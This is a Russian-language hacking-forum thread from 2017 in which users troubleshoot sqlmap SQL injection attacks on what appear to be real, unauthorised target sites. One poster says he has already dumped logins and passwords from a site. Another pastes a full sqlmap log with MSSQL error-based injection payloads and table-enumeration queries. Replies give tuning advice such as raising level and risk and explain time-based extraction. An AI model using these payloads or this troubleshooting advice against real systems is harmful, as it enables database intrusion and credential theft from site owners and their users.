ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

22.02.2017, 08:32
|
|
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
Провел на форуме: 43449
Репутация:
1
|
|
Такая трабла,есть скуля но мап не хочет куртить мотому что не видит ответ от сервера.Как указать строку где нужно смотреть.Знаю что есть команда --string но так и не разобрался как с ней работать
|
|
|

22.02.2017, 13:35
|
|
Новичок
Регистрация: 22.02.2017
Сообщений: 3
Провел на форуме: 679
Репутация:
0
|
|
Добрый день подскажите как исправить данную ситуацию :
При дампе БД или открытии таблиц , sqlmap выводит по одному символу через 3-5 сек.
Предлагает использовать --time-sec соглашаюсь.
Если отказаться, вообще не дампит
|
|
|

22.02.2017, 13:50
|
|
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
Провел на форуме: 97114
Репутация:
24
|
|
Сообщение от Runx
↑
Добрый день подскажите как исправить данную ситуацию :
При дампе БД или открытии таблиц , sqlmap выводит по одному символу через 3-5 сек.
Предлагает использовать --time-sec соглашаюсь.
Если отказаться, вообще не дампит
Time based SQL-inj по другому некак
|
|
|

22.02.2017, 13:52
|
|
Новичок
Регистрация: 22.02.2017
Сообщений: 3
Провел на форуме: 679
Репутация:
0
|
|
Сообщение от Octavian
↑
Time based SQL-inj по другому некак
Это и используется
|
|
|

22.02.2017, 13:56
|
|
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
Провел на форуме: 97114
Репутация:
24
|
|
Как он дампит по одному символу в секунду так и будет дампить
|
|
|

22.02.2017, 13:59
|
|
Новичок
Регистрация: 22.02.2017
Сообщений: 3
Провел на форуме: 679
Репутация:
0
|
|
Сообщение от Octavian
↑
Как он дампит по одному символу в секунду так и будет дампить
От чего это зависит? Если попробовать заюать другую уязвимость? У меня получалось лить БД (логины, пароли) причем достаточно быстро , но сейчас использую другую скулю и нужна другая таблица ( один и тот же сайт)
|
|
|

22.02.2017, 16:50
|
|
Участник форума
Регистрация: 25.04.2013
Сообщений: 153
Провел на форуме: 56255
Репутация:
2
|
|
Сообщение от Runx
↑
От чего это зависит? Если попробовать заюать другую уязвимость? У меня получалось лить БД (логины, пароли) причем достаточно быстро , но сейчас использую другую скулю и нужна другая таблица ( один и тот же сайт)
в данном случае стоит протестировать скрипт на --level 5 --risk 3, может быть булеан или юнион там есть.
|
|
|

08.03.2017, 11:13
|
|
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
Провел на форуме: 43449
Репутация:
1
|
|
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Пускает только в current-db,в соседние не пускает(.Есть два пользователя Админ и юзер я под юзером.У обоих нет пассов(по крайней мере null).Как подключиться под админом,или есть варинаты попасть в бд?
|
|
|

11.03.2017, 09:34
|
|
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
Провел на форуме: 43449
Репутация:
1
|
|
Код:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTQ2Mjg4MDUwOA9kFgICCA9kFgQCBA8PFgIeB1Zpc2libGVoZGQCDA8
WAh8AaGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFBkltYWdlMQ==&productselect=All&keywordsearch=fd' AND 7226
IN (SELECT (CHAR(113) CHAR(122) CHAR(120) CHAR(113) CHAR(113) (SELECT (CASE WHEN (7226=7226) THEN CHAR(49) ELSE CHAR(48
) END)) CHAR(113) CHAR(118) CHAR(118) CHAR(113) CHAR(113)))-- mvKE&Image1.x=11&Image1.y=14
Vector: AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
---
[05:28:16] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[05:28:16] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[05:28:16] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management sys
tem databases' tables
[05:28:16] [INFO] fetching tables for database: sfdsffsdf
[05:28:16] [PAYLOAD] fd' AND 4667 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(120)+CHAR(113)+CHAR(113)+(SELECT ISNULL(CAST(COUN
T(OPS2013..sysusers.name+CHAR(46)+OPS2013..sysobjects.name) AS NVARCHAR(4000)),CHAR(32)) FROM OPS2013..sysobjects INNER
JOIN OPS2013..sysusers ON OPS2013..sysobjects.uid BETWEEN OPS2013 AND OPS2013..sysusers.uid WHERE OPS2013..sysobjects.xt
ype IN (CHAR(117),CHAR(118)))+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113)+CHAR(113)))-- ZTea
[05:28:16] [WARNING] reflective value(s) found and filtering out
[05:28:16] [WARNING] the SQL query provided does not return any output
[05:28:16] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch
'--hex'
[05:28:16] [PAYLOAD] fd' AND 9754 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(120)+CHAR(113)+CHAR(113)+(SELECT ISNULL(CAST(COUN
T(name) AS NVARCHAR(4000)),CHAR(32)) FROM OPS2013..sysobjects WHERE xtype BETWEEN CHAR AND CHAR(85))+CHAR(113)+CHAR(118)
+CHAR(118)+CHAR(113)+CHAR(113)))-- jCfI
[05:28:17] [WARNING] the SQL query provided does not return any output
[05:28:17] [CRITICAL] unable to retrieve the tables for any database
Не могу получить таблицы
parse-error
Код:
'System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster'
|
|
|

12.03.2017, 17:42
|
|
Новичок
Регистрация: 28.03.2014
Сообщений: 21
Провел на форуме: 7519
Репутация:
0
|
|
Не получается проэксплуатировать, если перейти по такой ссылке site.ru/filmnews/1, то респонс будет такой :
Код HTML:
Warning: implode() [function.implode]: Invalid arguments passed in /home/web/site/www/modules/filmnews.php on line 42
Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home/web/site/www/modules/filmnews.php on line 43
�
запуск sqlmap.py -u "site.ru/filmnews/1*" не помогает, складывается ощущение, что чего-то не хватает.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|